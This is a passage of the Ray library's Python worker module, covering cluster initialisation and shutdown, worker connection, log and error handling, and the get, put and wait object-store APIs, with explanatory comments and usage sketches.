versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
# User passed in extra keyword arguments but isn't connecting through
# ray client. Raise an error, since this is most likely a typo in a keyword argument.
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if runtime_env:
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to the GCS client when
# Redis removal is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
lru_evict=_lru_evict,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
if driver_mode == SCRIPT_MODE and job_config:
# Rewrite the URI. Note the package isn't uploaded to the URI until
# later in the connect.
working_dir_pkg.rewrite_runtime_env_uris(job_config)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` would still be True
# # if we didn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
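# Illustrative sketch (not part of the original module): starting a local
# cluster with explicit resources and reading the returned address info. The
# "node_ip_address" key is assumed to be present in the address_info dict.
#
#     info = ray.init(num_cpus=4, resources={"CustomResource": 2})
#     print(info["node_ip_address"])
#     ray.shutdown()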
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook
def shutdown(_exiting_interpreter: bool = False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
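# Illustrative sketch: the primary use case is cleaning up state between
# tests, e.g. as a pytest fixture (pytest usage here is an assumption).
#
#     import pytest
#
#     @pytest.fixture
#     def ray_session():
#         ray.init(num_cpus=1)
#         yield
#         ray.shutdown()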
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ray_constants.LOG_PREFIX_EVENT_SUMMARY in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"cluster status. To disable these "
"messages, set RAY_SCHEDULER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(ray_constants.LOG_PREFIX_EVENT_SUMMARY)[1]
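# Illustrative sketch (assumes AUTOSCALER_EVENTS is enabled and that
# LOG_PREFIX_EVENT_SUMMARY is the ":event_summary:" token): only lines
# carrying the magic token are surfaced, preceded once by the FYI tip.
#
#     lines = ["raylet noise",
#              ":event_summary: Adding 2 nodes of type m4.large."]
#     for event in filter_autoscaler_events(lines):
#         print(event)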
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
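# Equivalent divmod-based sketch of the computation above (illustrative only):
#
#     delta = time.time() - t0
#     hours, rem = divmod(int(delta), 3600)
#     minutes, seconds = divmod(rem, 60)
#     # e.g. 930 seconds since start -> "15m30s"; 45 seconds -> "45s"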
# When we enter a breakpoint, worker logs are automatically disabled via this.
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
if not _worker_logs_enabled:
return
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data["pid"] in ["autoscaler", "raylet"]:
return ""
else:
res = "pid="
if data["actor_name"]:
res = data["actor_name"] + " " + res
elif data["task_name"]:
res = data["task_name"] + " " + res
return res
def color_for(data: Dict[str, str], line: str) -> str:
"""The color for this log line."""
if data["pid"] == "raylet":
return colorama.Fore.YELLOW
elif data["pid"] == "autoscaler":
if "Error:" in line or "Warning:" in line:
return colorama.Style.BRIGHT + colorama.Fore.YELLOW
else:
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data["pid"] == "autoscaler":
pid = "scheduler +{}".format(time_string())
lines = filter_autoscaler_events(data["lines"])
else:
pid = data["pid"]
lines = data["lines"]
if data["ip"] == data["localhost"]:
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM,
color_for(data,
line), prefix_for(data),
pid, colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(
colorama.Style.DIM, color_for(data, line), prefix_for(data), pid,
data["ip"], colorama.Style.RESET_ALL, line),
file=print_file)
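# Illustrative sketch of the dict shape this handler expects (keys taken from
# the accesses above; the values are made up):
#
#     data = {"ip": "127.0.0.1", "localhost": "127.0.0.1", "pid": 12345,
#             "actor_name": "", "task_name": "f", "is_err": False,
#             "lines": ["hello from a worker"]}
#     print_to_stdstream(data)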
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
@PublicAPI
@client_mode_hook
def is_initialized() -> bool:
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
worker_shim_pid=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
ray_debugger_external (bool): If True, make the Ray debugger reachable
from outside the node this worker runs on.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.push_error_to_driver_through_redis(
worker.redis_client,
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
else:
# Add hook to suppress worker logs during breakpoint.
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
worker.ray_debugger_external = ray_debugger_external
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid)
worker.gcs_client = worker.core_worker.get_gcs_client()
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environment will be prepared
# at the server side.
if mode == SCRIPT_MODE and not job_config.client_job:
manager = working_dir_pkg.WorkingDirManager(
worker.node.get_runtime_env_dir_path())
manager.upload_runtime_env_package_if_needed(job_config)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get("tracing_startup_hook"):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get("tracing_startup_hook").decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
key (str): The key name for the message. Multiple messages under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
dtype (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
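# Illustrative sketch (actor and message are hypothetical; assumes this
# function is exported at the top-level ray namespace): surfacing the
# progress of a long-running actor method in the dashboard.
#
#     @ray.remote
#     class Trainer:
#         def train(self):
#             for epoch in range(100):
#                 ray.show_in_dashboard(f"epoch {epoch}", key="progress")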
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
*,
timeout: Optional[float] = None) -> Union[Any, List[Any]]:
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
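# Illustrative sketch (task definition is hypothetical): fetching a single
# ref, a list of refs, and using a timeout to bound the wait.
#
#     @ray.remote
#     def square(x):
#         return x * x
#
#     ref = square.remote(3)
#     assert ray.get(ref) == 9
#     assert ray.get([square.remote(i) for i in range(3)]) == [0, 1, 4]
#     value = ray.get(ref, timeout=10)  # GetTimeoutError if it takes longer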
@PublicAPI
@client_mode_hook
def put(value: Any, *,
_owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, its worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
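# Illustrative sketch: storing a large object once and sharing the ref; the
# _owner form (the actor handle shown is hypothetical) is only needed when
# the object's lifetime should be decoupled from the creating process.
#
#     big_list = list(range(10**6))
#     ref = ray.put(big_list)
#     # ref = ray.put(big_list, _owner=some_actor_handle)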
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook
def wait(object_refs: List[ray.ObjectRef],
*,
num_returns: int = 1,
timeout: Optional[float] = None,
fetch_local: bool = True
) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining
object refs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
